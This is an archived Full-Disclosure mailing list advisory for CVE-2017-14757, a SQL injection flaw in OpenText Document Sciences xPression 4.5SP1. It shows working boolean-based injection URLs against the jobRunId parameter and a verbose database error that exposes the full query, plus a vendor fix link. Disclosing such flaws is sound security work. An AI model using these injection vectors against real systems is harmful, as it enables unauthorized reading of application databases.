lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAGOhvvKd_EW9vf4ypRUkBGb-QsdnO=Po=goSwXSuOnWXFFw6BA@mail.gmail.com>
Date: Fri, 6 Oct 2017 09:13:33 +0200
From: Marcin Wołoszyn <mw@....pl>
To: fulldisclosure@...lists.org
Subject: [FD] OpenText Document Sciences xPression (formerly EMC Document
 Sciences xPression) - SQL Injection

(This is re-submission of corrected advisory due to accidental CVE-ID swapping)


Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.

Vector :
--------

True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

Results in the following error in response:

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbsp;</b>

  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---&gt; nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---&gt; nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended

An attacker can see whole query and injection point. This can also be
used for error-based data extraction.

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ